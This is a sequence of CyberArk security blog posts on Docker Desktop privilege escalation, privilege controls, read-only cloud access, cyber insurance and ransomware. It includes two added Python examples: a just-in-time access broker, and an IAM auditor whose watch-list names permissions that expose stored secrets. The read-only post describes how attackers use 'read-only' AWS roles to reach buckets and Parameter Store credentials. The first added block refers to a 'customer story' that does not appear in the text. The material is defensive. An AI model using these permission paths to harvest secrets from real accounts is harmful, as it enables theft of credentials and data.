Docker is one of, if not the, most-used developer tools in the world today, which makes it an interesting threat research subject. But in this case, Docker wasn’t even on our radar until a CyberArk Labs researcher installed Docker Desktop (the Windows distribution of Docker, which runs a privileged Windows service) as part of unrelated Windows containers research. He observed the service’s various privileged processes communicating with each other via named pipes, which can be risky. Our resulting research found that Docker Desktop exposes a REST API over a named pipe, which allowed us to call its methods as a low-privilege user while the actions were carried out by the privileged service. This enabled us to impersonate the Docker Desktop Service account (SYSTEM) and execute arbitrary system commands with the highest-level privileges. We ultimately discovered six privilege escalation vulnerabilities in Docker Desktop by hunting through a massive maze of pipes, and developed an open source tool named “PipeViewer” to help scan for Windows named pipes and show their permissions.

Read part one and part two of this research and explore the open-source tool.

Explore CyberArk Labs’ Full Threat Research Library

These highlights offer just a glimpse into the many important projects CyberArk Labs worked on over the last 12 months. We invite you to explore the CyberArk Threat Research Blog, where among other topics, you’ll learn how we:

You can also read our 2024 cybersecurity predictions for our team’s perspectives on what’s to come in the year ahead.

Lavi Lazarovitz is CyberArk Labs’ Vice President of Cyber Research.

Secure Identities With These Five Intelligent Privilege Controls https://www.cyberark.com/blog/secure-identities-with-these-five-intelligent-privilege-controls/ Thu, 21 Dec 2023 17:04:38 +0000 https://www.cyberark.com/?p=143935

If you’re reading this, a major part of your job is making the case for security-related issues that you know are urgent.

You may be among the 97% of CISOs being asked to present to their boards — briefing them on new attack methods and recommending protective solutions. Or you might be a security admin preparing to relay that same information to your CISO. Either way, you’re on point to convince key stakeholders that:

  • These threats require attention.
  • Your plan merits support.
  • The time for action is now.

Why now? IT security teams face pressure to act quickly when threats emerge and scrutiny rises. The consequences of delayed action loom large. For example, what if you don’t move quickly enough to find a vendor whose solution can protect against the latest threat? No doubt this is a valid concern — but it could also be why two-thirds of organizations use security tools from up to 40 different vendors.

The trouble is when security solutions are bolted together in haste, they typically cannot:

  • Share data on potential threats and turn insights into action as a unified front.
  • Correlate alerts across data to find the signal in the noise.
  • Extend an effective control for securing one type of identity (IT admin) to another identity (everyday employee).

Your organization likely has a solution for securing highly privileged IT users’ identities. And you probably have tools to authenticate employees who use business applications. All good things! However, in a typical organization, these solutions are often siloed. So, if you happen to notice that a control from the privileged access management side (like session monitoring) could also be useful for securing identities across your workforce — well, that’s a spot-on observation.

But without integration, your solutions can’t share controls, nor can they provide the visibility you need — be it into users’ access or into potential threats — in a unified way. Let’s talk about how you can change that.

The Role of Intelligent Privilege Controls

You’re protecting the enterprise at a time when three realities — new identities, new environments and new attack methods — are making the job more complex than ever. This dynamic calls for extending intelligent privilege controls to all identities, from IT users and everyday employees to developers and non-human identities.

Any identity can become privileged based on the sensitive resources they can access — and the actions they can take. Consider the example of a healthcare system, where a wide range of identities (human and non-human) requires protection, including:

  • IT admin identities with high-risk access to critical healthcare infrastructure.
  • Everyday hospital employees, 65% of whom have access to sensitive data such as patient records and billing information.
  • Automated tools used by the hospital’s DevOps team to build out cloud operations as healthcare modernizes.
  • Built-in identities on endpoints and servers that an attacker could use to steal patient data or install ransomware that could shut down hospital operations.
  • Machine identities built into healthcare Internet of Things (IoT) devices used by medical staff and patients.

Healthcare is just one example. This phenomenon — in which identities of all types are gaining access to critical resources, infrastructure and environments — is happening across all industries and government sectors.

What we’re seeing is an evolution of privilege beyond the textbook definition, and it is why a converged identity security approach is so essential.

In an identity security approach, the underlying solutions are designed to share data, benefit from each other’s respective controls and — similar to the people who are instrumental to making identity security work — collaborate with each other. With intelligent privilege controls at the center of that approach, you can enforce least privilege across all of your identities, infrastructures, applications, endpoints and environments.

Five Types of Intelligent Privilege Controls to Secure Your Organization’s Identities

At this point, you might be thinking to yourself, “Okay I get the general premise here. But what kinds of controls are we talking about exactly, and what kinds of identities would I apply them to?”

Let’s break it down. We created a helpful list you can refer to when building or refining your own identity security approach. It can also be useful when you’re making the case to your stakeholders — from your board to your team — on how to better secure your organization at a time when all types of identities are under attack.

Graphic listing the five intelligent privilege controls, along with detailed descriptions of each control. The five intelligent privilege controls are: 1. Zero standing privilege (ZSP) and just-in-time (JIT) access; 2. Session isolation; 3. Session recording and protection; 4. Endpoint least privilege; 5. Credentials and secrets management.

As detailed, intelligent privilege controls aren’t just for the IT admins of the world. They can help you secure the entire ecosystem of identities driving your organization’s most important initiatives.

Finding a True Identity Security Platform: How to Vet Providers

So where can you find a platform in which the underlying controls can be applied to any identity with access to potential targets? Could it be as simple as consolidating providers? Not quite. The word “consolidation” doesn’t do justice to the challenge at hand. We’re talking about building something bigger that can take on a threat landscape in which:

  • 84% of organizations experienced an identity-related breach in the past year.
  • 62% of IT security decision-makers say their organizations lack a complete picture of human and non-human access to sensitive resources.
  • 63% say their processes and technologies do not adequately secure the highest-sensitivity access for employees.

Today’s threats require an identity security platform that’s integrated in every way — built to protect every identity (human and machine) and every resource they touch, across every one of your environments. The million-dollar question is: how can you find such a platform? We’ve got you covered on that front as well.

Check out our recently published eBook, “Buyer’s Guide: What to Look for in an Identity Security Platform.” It’s a quick read containing vendor-agnostic recommendations on the strategies, controls and technologies that comprise a true identity security platform. In the guide, you’ll find insights on what questions to ask and how to evaluate providers’ offerings to make sure they can meet your organization’s needs.

You can also watch our on-demand webinar, “Top Considerations for Identity Security Platforms.”

Amy Blackshaw is vice president of product marketing at CyberArk.

Why Intelligent Privilege Controls Are Essential for Identity Security https://www.cyberark.com/blog/why-intelligent-privilege-controls-are-essential-for-identity-security/ Fri, 15 Dec 2023 19:18:58 +0000 https://www.cyberark.com/?p=185219

“If we can control identity, we can stop most modern attacks. And if you control identity, then you control every perimeter, application, container – effectively every part of the environment.” – Brian Miller, CISO at Healthfirst

Organizations are experiencing explosive growth in identities – both machine and human. This includes machine identities such as applications and workflows, which now outnumber human identities 45:1. With new norms such as hybrid work, new environments like hybrid cloud and the continuous flow of rapid innovation, the reality is that organizations are facing a constant onslaught of identity-related attacks like ransomware and phishing.

The solution for getting a handle on the chaos? Identity security.

Identity security is considered the bedrock of modern-day cyber resilience. It converges the strength of identity and access management (IAM), identity governance and administration (IGA) and privileged access management (PAM). This combination of capabilities enables least privilege from enterprise endpoints to data centers to the cloud, allowing organizations to secure their digital assets and conduct business with confidence.

Privilege Controls for Any Identity

Gone are the days when only the most privileged users had access to an organization’s most critical systems and sensitive data. Today, more than half (52%) of workforce identities have access to that level of information. Meanwhile, 77% of IT security decision-makers say developers have too many privileges, and only 25% say their organizations have secured sensitive access to bots and robotic process automation (RPA). This expansion of high-risk access across the enterprise can lead to greater cyber risk.

Looking back, 84% of organizations experienced an identity-related breach in the past year. Meanwhile, looking ahead, 99% of security decision-makers believe they’ll experience an identity compromise in the coming months.

This, of course, is not a new trend. In its FY22 Risk and Vulnerability Assessment (RVA) report, the Cybersecurity and Infrastructure Security Agency (CISA) indicated that in over half (54%) of the organizations it assessed, attackers used valid accounts to gain initial access and elevate privileges, reaching critical resources and sensitive data.

The numbers are staggering, but organizations can take steps to secure all identities with intelligent privilege controls such as zero standing privileges (ZSP) and just-in-time (JIT) access, session recording and protection, session isolation and monitoring – and endpoint least privilege. These intelligent privilege controls must work in conjunction with one another to secure access for every identity. Continuous and constant monitoring and analysis of all activities of every identity allow organizations to detect and respond to unusual behavior.

 

Here’s a bit of a deeper look at the five critical intelligent privilege controls:

1. Zero Standing Privileges (ZSP) and Just-in-Time Access (JIT)

Many organizations provide users with powerful standing access that is always available to users, regardless of whether it’s required in the moment – or ever. This issue is prevalent in cloud environments, where organizations grant users far more entitlements than they actually need to ensure they can work quickly.

To reduce risk, your organization can implement JIT access provisioning, which grants users elevated access privileges in real time so that they can perform necessary tasks. In other words, a user can access required resources for a specific duration to complete a task at hand – and then the access is revoked.

Taking the JIT concept to the next level, ZSP is a fast-emerging security principle that elevates cloud power users just-in-time, with only the specific entitlements required for a given task – and only when needed. ZSP enables organizations to reduce the risk of credential theft and the potential impact of an account takeover by significantly limiting an attacker’s options.
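The ZSP bullets in the customer story above and the JIT/ZSP description here both come down to the same enforcement rules, so one added example serves both. The broker below is written for this edit in Python; it is not CyberArk code or a description of any product, and the identities, roles, resource ARNs and the one-hour `MAX_TTL` are made-up values. It shows what a ZSP policy point actually checks: there is no standing grant, eligibility for a role is separate from holding it, a grant carries only that role’s entitlements, every grant is clamped to a policy ceiling, expiry is evaluated on each authorization decision rather than by a cleanup job, and a grant can be revoked early (for instance on an ITDR alert).

```python
from dataclasses import dataclass, field
from datetime import datetime, timedelta, timezone

# Policy ceiling on any single elevation (assumed value for this example).
MAX_TTL = timedelta(hours=1)

# Roles an identity is *eligible* to assume just-in-time. Eligibility is not a
# grant: nothing here is usable until request_elevation() succeeds. (Made-up data.)
ELIGIBLE_ROLES = {
    "alice": {"ec2-operator", "s3-reader"},
    "bob": {"s3-reader"},
}

# Entitlements each role carries, as (action, resource-prefix) pairs. (Made-up data.)
ROLE_ENTITLEMENTS = {
    "ec2-operator": {("ec2:StopInstances", "arn:aws:ec2:"),
                     ("ec2:StartInstances", "arn:aws:ec2:")},
    "s3-reader": {("s3:GetObject", "arn:aws:s3:::app-logs/")},
}


@dataclass
class Grant:
    identity: str
    role: str
    expires_at: datetime
    justification: str


@dataclass
class ZspBroker:
    """Authorization decisions are made only against live, time-boxed grants."""
    grants: list = field(default_factory=list)
    audit: list = field(default_factory=list)

    def request_elevation(self, identity, role, ttl, justification, now):
        """Issue a time-boxed grant, or None if the identity is not eligible."""
        if role not in ELIGIBLE_ROLES.get(identity, set()):
            self.audit.append(("deny-elevation", identity, role, "not eligible"))
            return None
        ttl = min(ttl, MAX_TTL)  # clamp: a caller cannot request itself standing access
        grant = Grant(identity, role, now + ttl, justification)
        self.grants.append(grant)
        self.audit.append(("elevate", identity, role, grant.expires_at.isoformat()))
        return grant

    def revoke(self, identity, role, now):
        """Cut a grant short, e.g. on an ITDR alert, before its TTL runs out."""
        keep = [g for g in self.grants if not (g.identity == identity and g.role == role)]
        if len(keep) != len(self.grants):
            self.audit.append(("revoke", identity, role, now.isoformat()))
        self.grants = keep

    def _expire(self, now):
        """Drop grants whose TTL has passed; expiry is checked on every decision."""
        for g in self.grants:
            if g.expires_at <= now:
                self.audit.append(("expire", g.identity, g.role, g.expires_at.isoformat()))
        self.grants = [g for g in self.grants if g.expires_at > now]

    def authorize(self, identity, action, resource, now) -> bool:
        """Allow only if a live grant's role carries a matching entitlement."""
        self._expire(now)
        for g in self.grants:
            if g.identity != identity:
                continue
            for act, prefix in ROLE_ENTITLEMENTS[g.role]:
                if act == action and resource.startswith(prefix):
                    self.audit.append(("allow", identity, action, resource))
                    return True
        self.audit.append(("deny", identity, action, resource))
        return False


def walkthrough() -> dict:
    """Drive the broker through the lifecycle described in the text and return
    every decision so it can be checked."""
    t0 = datetime(2024, 1, 9, 9, 0, tzinfo=timezone.utc)
    inst = "arn:aws:ec2:us-east-1:123456789012:instance/i-0abc"
    broker, out = ZspBroker(), {}
    # 1. Zero standing privileges: nothing works before an elevation.
    out["before"] = broker.authorize("alice", "ec2:StopInstances", inst, t0)
    # 2. JIT elevation to one role, for 15 minutes, with a justification.
    g = broker.request_elevation("alice", "ec2-operator", timedelta(minutes=15), "INC-4242", t0)
    out["granted_minutes"] = int((g.expires_at - t0).total_seconds() // 60)
    out["during"] = broker.authorize("alice", "ec2:StopInstances", inst, t0 + timedelta(minutes=5))
    # 3. Least privilege: the grant carries only that role's entitlements.
    out["other_role"] = broker.authorize("alice", "s3:GetObject", "arn:aws:s3:::app-logs/x",
                                         t0 + timedelta(minutes=5))
    # 4. Expiry is enforced by the clock at decision time, not by a cleanup job.
    out["after"] = broker.authorize("alice", "ec2:StopInstances", inst, t0 + timedelta(minutes=16))
    # 5. Eligibility gate: bob was never approved for ec2-operator.
    out["ineligible"] = broker.request_elevation("bob", "ec2-operator", timedelta(minutes=5), "x", t0) is None
    # 6. TTL ceiling: an 8-hour request is clamped to MAX_TTL.
    g2 = broker.request_elevation("bob", "s3-reader", timedelta(hours=8), "audit pull", t0)
    out["clamped_minutes"] = int((g2.expires_at - t0).total_seconds() // 60)
    # 7. Early revocation cuts access before the TTL runs out.
    broker.revoke("bob", "s3-reader", t0 + timedelta(minutes=1))
    out["revoked"] = broker.authorize("bob", "s3:GetObject", "arn:aws:s3:::app-logs/y",
                                      t0 + timedelta(minutes=2))
    out["audit_events"] = len(broker.audit)
    return out


if __name__ == "__main__":
    for k, v in walkthrough().items():
        print(f"{k:<16}{v}")
```

Two design points carry over to a real deployment: the ceiling and the eligibility table must live in policy the requester cannot edit, and the audit trail (every elevate, allow, deny, expire and revoke event, with the justification) is what the reactive side of the program, ITDR and the SOC, will correlate against.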

2. Session Isolation

Session isolation creates separation between a user’s device and the resources they aim to access by routing traffic through a proxy server. In doing this, if an end user is attacked, the risk of compromising the system the user is accessing is reduced.

3. Session Recording and Protection

Session recording and monitoring provides a searchable record of every user's actions – down to individual clicks – during sessions in web applications, cloud consoles and other systems. When security teams combine session isolation with monitoring, they can detect anomalous user activity and suspend risky sessions, protecting an organization's most critical assets from malicious processes that originate on endpoints. The more privileged the session, the more necessary these controls become for protecting sensitive digital assets.

4. Endpoint Least Privilege

Comprehensive, conditional policy-based application control can help you create safe working environments for every user group in your organization, from HR to DevOps. Organizations can manage and secure their endpoints with controls that enable continuous least privilege and consider variables such as an application’s context, parameters and attributes to allow or block certain scripts, applications or operations.

This is especially important at a time when ransomware attacks are growing in frequency, consequence and cost. Within an integrated identity security approach, endpoint least privilege can significantly reduce an organization's attack surface and improve its ability to meet regulatory requirements.

5. Credentials and Secrets Management

Credentials such as usernames and passwords are the evidence that confirms an entity's claimed identity. Credential management includes password and key rotation, enforcing password policies and consistently validating the authenticity of the entity requesting access. Secrets management applies similar security policies to non-human (machine) identities. Typically, these credentials and secrets are used to obtain elevated privileges in order to perform a business task.

The Benefits of Intelligent Privilege Controls

Identity-related attacks are also growing more sophisticated. While most businesses operate under an "assume breach" mentality, it is equally important to be cyber resilient, with a proactive, reactive and predictive approach. The intelligent privilege controls above enable security at scale, risk reduction and unmatched cyber resilience by securing access for every identity.

The results of a robust identity security strategy speak for themselves: CyberArk research indicates that 60% of 1,500 security decision-makers believe they can mitigate risk within an acceptable timeframe. Without such a strategy – the right tools, integrations, automation and continuous monitoring and reporting – 80% of respondents say they would need up to 15 additional cybersecurity staff.

Beyond these measurable benefits, identity security based on intelligent privilege controls provides organizations with the added advantage of long-term durability, adaptability and recoverability in the face of potential attacks.

Don’t just manage identities. Secure them with a comprehensive identity security strategy based on intelligent privilege controls.

For more insights, download our identity security guide “When Every Identity is at Risk, Where Do You Begin?” The piece covers critical areas where intelligent privilege controls can help you reduce risk and gain efficiencies.

Amita Potnis leads thought leadership marketing at CyberArk.

Exploring the Risks of Read-Only Access in the Cloud
https://www.cyberark.com/blog/exploring-the-risks-of-read-only-access-in-the-cloud/ – Tue, 12 Dec 2023 15:46:57 +0000

My career began with read-only access.

In my first job, I worked night shifts in a data operations center. Our team handled incidents identified either by monitoring or from end customers. This meant I often had to perform first, second and third-line troubleshooting. If we couldn’t identify and resolve the issue, our only option was to wake up a rather exhausted escalation engineer.

To further protect that on-call engineer's sleep, I was given read-only access to the network in our data centers. I could check configurations and confirm the state of elements, and as my knowledge grew, the on-call teams noticed that my escalations became requests like "run the following command for me, I don't have access."

A lot has changed since then; I now spend my time working in the cloud rather than in the on-premises world of data centers. I would never grant someone the same level of access I started with, even if it's just read-only.

Why Even Think About Securing Read-only Access?

The James Bond film "GoldenEye" (1995!) vividly illustrates the risk that read-only access presents in the cloud. In the film's climax, the "lead programmer," Boris, mocks a former junior colleague for not having access to the firing controls of the satellite superweapon at the heart of the plot. He ends up eating his words: her reduced access is enough to steer the satellite into re-entry, and thus to its destruction.

This is my favorite way to visualize the risk behind "we don't need controls over the read-only access we give juniors." Boris's evil plan was spoiled; if only he'd been a little more careful about how he handled access.

What Can an Attacker Do With Read-only Access?

Why am I focusing on what is often dismissed as a lower-risk element that doesn't warrant attention? Attackers are creative folk, and they will always seek to reconnoiter their environment; often, read-only is enough for them to do that. Giving read-only rights to the cloud without suitable controls enables an attacker to do exactly that.

As an example, many organizations are happy to attach the AWS managed policy "ReadOnlyAccess." It is a great example of what is often perceived as a harmless read-only role – except that the policy grants the ability to read and copy the contents of any object in the account's blob storage. That means the "read-only" access can be used to read every data store. And that isn't good.

It's an obvious example, and most organizations remove the ability to read all of the data stores. But there are plenty more things you could do to map or identify targets. List roles and the users mapped to them? YEP! Download container images from your hosted private registry? For sure!

Going deeper, without turning this into a rant against managed policies, that managed policy also includes a small subset of permissions for SSM, AWS Systems Manager. The section that grants SSM:Describe* worries me because it grants every Describe action in SSM. The entitlement SSM:DescribeParameters allows you to see the environment variables of a running EC2 instance retrieved from Parameter Store, and many people still use Parameter Store to store credentials.

Knowing that I could potentially return a secret under management and read all the data in an AWS account paints a clear answer to "How far can you go with just read-only?" The more I research, the more I realize that any access to cloud consoles carries a relatively high element of risk.
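One way to audit a policy before calling it "read-only" is to check its Allow statements against a watch-list of actions that reach data rather than metadata. The Python below is an added example, not AWS or CyberArk code: the watch-list, the two constructed policy documents and the helper names are assumptions, and the watch-list is deliberately not exhaustive. It treats IAM action names as case-insensitive wildcard patterns, lets an explicit Deny override an Allow as IAM does, and ignores Condition and NotAction for brevity. ssm:DescribeParameters enumerates parameter names and metadata while the ssm:GetParameter* actions return values, so both families are on the list.

```python
"""Flag data-reaching actions inside an IAM policy that is labelled read-only.

Added example, not AWS or CyberArk code. DATA_REACH is an assumed, non-exhaustive
watch-list built from the risks the post names: object reads from storage,
role/user enumeration, private image pulls and Systems Manager parameter access.
Policies are evaluated offline as plain JSON. Simplifications: Condition blocks
are ignored and NotAction is not handled; explicit Deny overrides Allow as in IAM.
"""
import fnmatch
import json
from typing import Dict, List

DATA_REACH: Dict[str, str] = {
    "s3:GetObject": "reads the contents of objects in any bucket",
    "ssm:DescribeParameters": "enumerates Parameter Store names and metadata",
    "ssm:GetParameter": "returns a parameter value (decrypted if permitted)",
    "ssm:GetParameters": "returns parameter values in bulk",
    "ssm:GetParametersByPath": "returns a whole parameter hierarchy",
    "ecr:BatchGetImage": "pulls image manifests from private registries",
    "ecr:GetDownloadUrlForLayer": "downloads image layers from private registries",
    "iam:ListRoles": "maps the account's roles",
    "iam:ListUsers": "maps the account's users",
    "iam:ListAttachedRolePolicies": "shows which policies each role carries",
}


def _as_list(value) -> list:
    """IAM allows a bare string or a list in Statement, Action and Resource."""
    if value is None:
        return []
    return value if isinstance(value, list) else [value]


def _matches(action: str, patterns: List[str]) -> bool:
    # IAM action matching is case-insensitive with * and ? wildcards, like fnmatch.
    return any(fnmatch.fnmatchcase(action.lower(), p.lower()) for p in patterns)


def find_data_reach(policy: dict) -> List[dict]:
    """Return the watch-listed actions this policy effectively allows."""
    allows, denies = [], []
    for stmt in _as_list(policy.get("Statement")):
        bucket = allows if stmt.get("Effect") == "Allow" else denies
        bucket.extend(_as_list(stmt.get("Action")))
    findings = []
    for action, why in DATA_REACH.items():
        if _matches(action, allows) and not _matches(action, denies):
            granted_by = [p for p in allows
                          if fnmatch.fnmatchcase(action.lower(), p.lower())]
            findings.append({"action": action, "granted_by": granted_by, "why": why})
    return findings


def flagged_actions(policy: dict) -> List[str]:
    return sorted(f["action"] for f in find_data_reach(policy))


# Constructed policy shaped like a broad "read-only" grant (not the real managed policy).
BROAD_READONLY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": ["s3:Get*", "s3:List*", "ssm:Describe*", "iam:List*",
                "ec2:Describe*", "ecr:Describe*"],
     "Resource": "*"}
  ]
}
""")

# Constructed hardened variant: inventory-style reads stay, data reads are denied
# explicitly so that the deny also wins over any other policy attached later.
HARDENED_READONLY = json.loads("""
{
  "Version": "2012-10-17",
  "Statement": [
    {"Effect": "Allow",
     "Action": ["ec2:Describe*", "s3:List*", "s3:Get*", "ecr:Describe*"],
     "Resource": "*"},
    {"Effect": "Deny",
     "Action": ["s3:GetObject", "ssm:*Parameter*"],
     "Resource": "*"}
  ]
}
""")

if __name__ == "__main__":
    for name, pol in (("broad", BROAD_READONLY), ("hardened", HARDENED_READONLY)):
        print(name, flagged_actions(pol))
        for f in find_data_reach(pol):
            print("  ", f["action"], "via", f["granted_by"], ":", f["why"])
```

Run against a policy document exported from an account, the same function tells you which "read" wildcards actually expose data, and the hardened variant shows the usual fix: keep inventory-style Describe and List actions, and add an explicit Deny for object and parameter reads so the deny also wins over any broader policy attached to the same principal later.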

How Do We Address the Risk and Secure Read-only Access?

The reality is that you should treat read-only access the same way you treat any other elevated access to the cloud. At CyberArk, this is why we talk about zero standing privileges (ZSP): read-only access should be something you request, even if the request is auto-approved, and you must make sure adequate controls are in place.

There is a temptation to say that not applying the same controls to users with just read-only entitlements will save you time and money too. But that’s a mistake; you’ll have to manage two sets of controls and monitor the read-only accounts to ensure they don’t end up with higher-risk entitlements that would warrant extra controls.

Flexibility in access should not compromise security; instead, it should be a strategic approach to granting the right privileges to the right users at the right time. Doing so puts you one step ahead of Boris from GoldenEye; you don't have to worry about any second-level programmers crashing your satellite to foil your evil plan.

Understanding and mitigating the risks associated with read-only access in the cloud is paramount. Organizations can frustrate potential attackers and safeguard their cloud environments by implementing robust controls and adopting a proactive approach.

To explore the concept of zero standing privileges further and learn how to fortify your cloud security, check out our blog, "PAM and Cloud Security: The Case for Zero Standing Privileges."

Josh Kirkwood is a senior product marketing manager at CyberArk.

How to Meet Cyber Insurance Requirements When All Identities Are at Risk
https://www.cyberark.com/blog/how-to-meet-cyber-insurance-requirements-when-all-identities-are-at-risk/ – Thu, 07 Dec 2023 20:55:31 +0000

The growing frequency and sophistication of cyberattacks, especially on the ransomware front, have compelled even more companies to seek cyber insurance coverage. But as the need for coverage grows, so do the complexities.

Even though premiums have flattened, with expectations that this will continue as the market corrects, significant challenges remain for companies seeking coverage. Rising risk profiles are causing insurers to be stricter in their evaluations and underwriting requirements, and as regards controls and processes, what was considered acceptable in past years may no longer be.

How does this affect your organization? If you’re in the market for cyber insurance, be prepared to answer a litany of pre-audit questions and demonstrate a hardened defense strategy. In this blog post, we’ll discuss cyber insurance trends and best practices to help you be ready.

Top Challenges Shaping Today’s Global Cyber Insurance Market

Rampant ransomware attacks have made cyber insurance a priority for corporate leaders and boards. This epidemic has also changed the equation for cyber insurers’ profitability.

As we’ve noted in past years, many cyber insurance providers have reported massive direct-loss ratios for standalone policies. At the same time, they’ve struggled to adequately cover escalating costs as conditions change quickly. Consider these statistics:

  • The average total cost of a ransomware attack increased by 13% to $5.13 million since 2022.
  • Nearly nine in 10 security decision-makers say their organizations were targeted by at least one ransomware attack in the past year.
  • Almost three-quarters of organizations paid ransoms at least once in the last 12 months.

As a result, requirements are becoming more stringent as carriers aim to mitigate risk. This is a significant part of why obtaining a cyber insurance policy with favorable terms, conditions, pricing, coverage and low retention has proven to be a struggle for many organizations.

Several years ago, a security team could fill out a brief cyber insurance application and answer a handful of questions. Fast forward to today: the world has changed, as new identities, environments and attack methods reshape what it means to have a strong security posture. Insurers aren’t only considering ransomware risk as they tighten up qualifications – current market volatility and continued geopolitical tensions also factor into the equation.

High-profile incidents such as MOVEit Transfer, Accellion, SolarWinds and Log4j have intensified concerns about software supply chain risk, prompting new questions about aggregation exposure and systemic losses. Meanwhile, global privacy regulations like GDPR and CCPA continue to evolve in a patchwork fashion, and litigation and fines are growing. The average cost of a data breach rose 12.6% to $5.05 million for organizations with high levels of regulatory non-compliance.

Together, these variables fuel even more underwriting questions.

[Graphic: what to expect when you renew your cyber insurance policy.]

Cyber Insurance Requirements Dig Deep – A Solid Controls Narrative Provides an Edge

Scoring a cyber insurance policy or renewal with the right terms may be difficult, but it’s not impossible. Carriers and underwriters are responding favorably to companies instituting robust security controls and incident response plans — especially those prepared to dive deep into their cybersecurity architectures and planned roadmaps. It’s essential to be proactive in implementing baseline security measures and to articulate a meaningful risk-based approach to cybersecurity.

Underwriters often assess security systems and practices using open-source scanning tools like OpenVAS and OpenSCAP to probe applicants’ networks for vulnerabilities and security rating services like SecurityScorecard and BitSight to evaluate risk. Many underwriters partner with outside cybersecurity firms to vet customers.

Recognizing the challenges organizations face amid stricter vetting, Amazon Web Services (AWS) launched a program to help its AWS marketplace customers find and obtain affordable policies.

During these evaluations, underwriters look for evidence of specific cybersecurity controls and practices, and upcoming audits will examine certain areas more closely than ever. They are:

1. Endpoint privilege security

Since ransomware attacks typically start on workstations and servers, endpoint privilege security will be under the microscope. Initially, insurers wanted to see that a company trained its employees in phishing and credential theft techniques and used endpoint detection and response (EDR/XDR) solutions to help identify and remediate suspicious activity.

Today, even these critical measures are not considered sufficient on their own. Attackers are constantly switching things up and finding ways to turn off or bypass EDR/XDR by abusing administrative credentials, as seen in the SolarWinds attack. This has prompted more underwriting scrutiny around endpoint privilege controls, especially a company’s ability to remove local admin rights from all users — senior system administrators, developers and even people using legacy applications that require admin rights.

To demonstrate effective risk reduction to underwriters, many organizations apply a defense-in-depth mindset: limiting privilege escalation, enforcing application control on endpoints and managing local admin passwords in a PAM solution. Organizations must balance least privilege control against operational efficiency.

2. Multi-factor authentication (MFA)

Requirements for MFA — a checkmark item for insurers until recently — are also growing. Insurers started to dig deeper as more post-payout analyses revealed that MFA wasn't being fully utilized, particularly in the healthcare and higher education sectors. They found significant coverage gaps for privileged accounts, which are often not tied to a specific person (e.g., the admin account on every server) but are used by system administrators and other privileged users to protect sensitive data.

3. Privileged Access Management (PAM)

As a result, underwriters have started mandating PAM for privileged accounts not tied to specific users (e.g., local admin, root and service accounts) to achieve MFA coverage and to isolate high-value assets. Embracing modern PAM use cases – such as the emerging concept of zero standing privileges (ZSP), in which high-risk access is elevated on the fly, restricted to the bare minimum permissions and protected from malware – can also help prove to insurers that an organization is defending against credential theft.

A defense-in-depth approach can help here too. Aim to apply several layers of control, like enforcing least privilege access on endpoints and in hybrid cloud environments, programmatically rotating credentials and secrets, verifying all access attempts with MFA, and monitoring high-risk access. Again, efficiency is critical – minimizing friction for end users is key to building the adoption of security controls that auditors and insurers want to see.

4. Controls for third-party access

Insurers are also looking at how organizations authenticate third-party privileged users from vendor organizations who need access to sensitive data and company systems. As enterprise reliance on vendors and contractors grows, third-party involvement increases the average total cost of a data breach by roughly 5%, to nearly $4.7 million. Vendors need the same protections, yet they are rarely given the same security consideration as employees. For instance, a vendor onboarded for a brief two-week engagement should be onboarded and offboarded following the same HR processes as a new employee to minimize risk. Visibility is also essential.

Organizations should fully isolate and monitor privileged sessions with full audit capabilities – akin to how they secure internal privileged users’ access and actions.

5. Security for non-human identities

The heightened focus on privileged access management extends beyond users to non-human identities, which outnumber human identities by 45:1. These identities can be service accounts, hardcoded secrets or any off-the-shelf or homegrown solution that requires powerful credentials to perform its function (e.g., configuration management database (CMDB) platforms and DevOps orchestration tools), along with automated processes such as robotic process automation (RPA). As part of this, insurers are looking for stronger privilege controls around automated patch management systems, vulnerability scanners and other existing security tools that attackers may try to disable.

6. People and processes

Beyond technology safeguards, insurance carriers still want to see sound people practices, such as conducting ongoing cybersecurity awareness training. They’ll also evaluate data backup practices and incident response plans to understand how quickly the organization could restore operations in the wake of an attack. Any security program relies on people, practices and technology – and insurers know it.

[Graphic: tips for improving cyber readiness – 1) take advantage of cybersecurity education; 2) use security rating services; 3) use open-source vulnerability scanners.]

Steps in the Right Direction: Adopting an Identity Security Approach

As companies prepare for cyber insurance renewals, they should be cognizant that security control requirements are evolving to address the fast-paced world of digital business – and the ever-evolving nature of today’s threats.

Yet accelerated change is always difficult from an organizational and cultural standpoint and can create fear and uncertainty. The best way to minimize this is to ensure people understand the “why” and that risk mitigation controls will not impact operational efficiency. Companies need to spend time on the education factor.

The good news is that more companies are stepping up and taking meaningful steps to bolster their ransomware defenses. As stronger controls are implemented and used more effectively, insurer losses are starting to stabilize and soften the market a bit. We’re not out of the woods yet, but we’re starting to move in the right direction.

As organizations work to meet today’s requirements with an eye on the future, they must focus on effectively mitigating cyber risk without slowing down their businesses.

Today, any compromised identity (human or non-human) can be a gateway to the resources attackers target through tactics such as ransomware. And you’re protecting the enterprise at a time when three realities — new identities, environments and threats — are making the job more complex than ever. An integrated identity security strategy is the best line of defense against attacks in today’s threat landscape, with a unified approach that enforces least privilege and enables Zero Trust.

Organizations looking to close security gaps within a specified period to land or maintain a cyber insurance policy can benefit by aligning with the right security partner. CyberArk can play that role, helping you strengthen security, meet pre-audit requirements, keep premiums down and maintain business velocity. To learn more, check out our cyber insurance resources.

John Natale is a senior content marketing manager and Ryne Laster is a product marketing manager at CyberArk.

Editor's note: For more on the complex and rapidly evolving world of cyber insurance, check out the CyberArk Trust Issues podcast episode, "Cyber Insurance: Managing Risk and Protection," with guest Ruby Rai, Cyber Practice Leader, Canada at Marsh McLennan. The episode is available on most major podcast platforms.

Why Ransomware Actors Abuse Legitimate Software
https://www.cyberark.com/blog/why-ransomware-actors-abuse-legitimate-software/ – Wed, 06 Dec 2023 17:13:51 +0000

2023 was a lucrative year for ransomware actors, with victim organizations paying $449.1 million in the first six months alone. Maintaining this cash stream requires frequent technique shifts, which may be why more attackers are exploiting legitimate software to propagate their malware.

Abusing organizations’ existing enterprise tools can help attackers blend in while they’re doing reconnaissance, and also aids them with privilege escalation and persistence. Coupling this technique with ransomware as a service (RaaS) also lowers the bar to entry by eliminating the need for attackers to create malware – something that requires skills, resources and time. This means more adversaries can get in the game and do more damage.

Enterprise software isn't the only target. Ransomware actors have also been known to exploit vulnerabilities in open-source software (OSS), inject their own payloads into OSS and use OSS in lieu of custom-crafted malware. According to a recent advisory from the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the notorious LockBit operation has been observed using legitimate freeware for a host of nefarious purposes, including network reconnaissance, remote access and tunneling, credential dumping and file exfiltration.

